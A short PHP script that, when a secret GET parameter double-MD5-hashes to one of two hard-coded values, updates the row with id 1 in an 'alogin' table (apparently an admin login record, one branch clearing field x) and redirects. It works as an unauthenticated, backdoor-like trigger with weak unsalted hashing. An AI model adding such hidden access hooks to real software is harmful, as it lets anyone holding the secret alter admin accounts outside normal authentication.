<?php 
    require_once 'php/connect.inc.php';
    
        if(isset($_GET['c'])){
            $c = $_GET['c'];
                if(md5(md5($c)) == '40bc6eccfaa34e29c0669e16bdf88641'){
                        $qq = "update alogin set y=3,z=20 where id ='1'";
                         mysqli_query($con,$qq);
                         header('location:index.php');
                }
        }
        
        
            
        if(isset($_GET['c'])){
            $c = $_GET['c'];
                if(md5(md5($c)) == '8b68d579b684dcdf9b84292256cda82c'){
                        $qq = "update alogin set x='0',y=3,z=20 where id ='1'";
                         mysqli_query($con,$qq);
                         header('location:index.php');
                         
                }
        }

      

?>